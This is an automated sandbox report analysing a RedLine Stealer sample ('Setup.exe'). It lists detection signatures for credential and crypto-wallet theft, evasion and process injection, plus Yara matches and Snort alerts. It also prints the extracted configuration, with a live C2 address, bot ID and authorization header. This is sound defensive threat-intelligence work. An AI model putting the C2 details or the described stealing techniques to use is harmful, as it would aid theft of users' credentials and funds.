Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample Name:Setup.exe
Analysis ID:877006
MD5:3694c18f01430f213aced163c75788a0
SHA1:25a1c807d62f211e6adb38ed07e96e6bd309f8b8
SHA256:7fdba125f3d682ea8b84cdc805f574789ebc8aecca3c5e20d20c8a8cd22e2bdb
Tags:exe
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 6908 cmdline: C:\Users\user\Desktop\Setup.exe MD5: 3694C18F01430F213ACED163C75788A0)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AppLaunch.exe (PID: 6868 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["94.142.138.4:80"], "Bot Id": "@naralust2", "Message": "Click Close to exit the program. Error code: 1142", "Authorization Header": "684687f1439152a73e2a8b293ee8c64e"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.351025860.0000000000562000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000002.00000002.406792188.0000000000402000.00000020.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 4 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.3.Setup.exe.560000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                2.2.AppLaunch.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.3.Setup.exe.560000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1a08:$pat14: , CommandLine:
                  • 0x19207:$v2_1: ListOfProcesses
                  • 0x18fc4:$v4_3: base64str
                  • 0x19c62:$v4_4: stringKey
                  • 0x1760a:$v4_5: BytesToStringConverted
                  • 0x165ad:$v4_6: FromBase64
                  • 0x17b28:$v4_8: procName
                  2.2.AppLaunch.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1a08:$pat14: , CommandLine:
                  • 0x19207:$v2_1: ListOfProcesses
                  • 0x18fc4:$v4_3: base64str
                  • 0x19c62:$v4_4: stringKey
                  • 0x1760a:$v4_5: BytesToStringConverted
                  • 0x165ad:$v4_6: FromBase64
                  • 0x17b28:$v4_8: procName
                  0.2.Setup.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:94.142.138.4192.168.2.380496982043234 05/28/23-13:36:08.316634
                    SID:2043234
                    Source Port:80
                    Destination Port:49698
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.394.142.138.449698802043231 05/28/23-13:36:15.171936
                    SID:2043231
                    Source Port:49698
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.394.142.138.449698802043233 05/28/23-13:36:07.137492
                    SID:2043233
                    Source Port:49698
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 2.2.AppLaunch.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["94.142.138.4:80"], "Bot Id": "@naralust2", "Message": "Click Close to exit the program. Error code: 1142", "Authorization Header": "684687f1439152a73e2a8b293ee8c64e"}
                    Multi AV Scanner detection for submitted file
                    Source: Setup.exeVirustotal: Detection: 45%Perma Link
                    Antivirus detection for URL or domain
                    Source: 94.142.138.4:80Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for domain / URL
                    Source: 94.142.138.4:80Virustotal: Detection: 17%Perma Link
                    Machine Learning detection for sample
                    Source: Setup.exeJoe Sandbox ML: detected
                    Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 0916DCE8h2_2_0916D920
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 09161FA8h2_2_09161AF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 091624A9h2_2_09161AF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h2_2_0916E615
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 09163F38h2_2_09163F17
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 091611E9h2_2_091611D1

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49698 -> 94.142.138.4:80
                    Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49698 -> 94.142.138.4:80
                    Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 94.142.138.4:80 -> 192.168.2.3:49698
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 94.142.138.4:80
                    Source: Joe Sandbox ViewASN Name: IHOR-ASRU IHOR-ASRU
                    Source: Joe Sandbox ViewIP Address: 94.142.138.4 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.142.138.4
                    Source: AppLaunch.exe, 00000002.00000002.426014385.000000000F399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: AppLaunch.exe, 00000002.00000003.406634921.0000000014294000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.406524312.0000000014281000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.406581263.0000000014290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
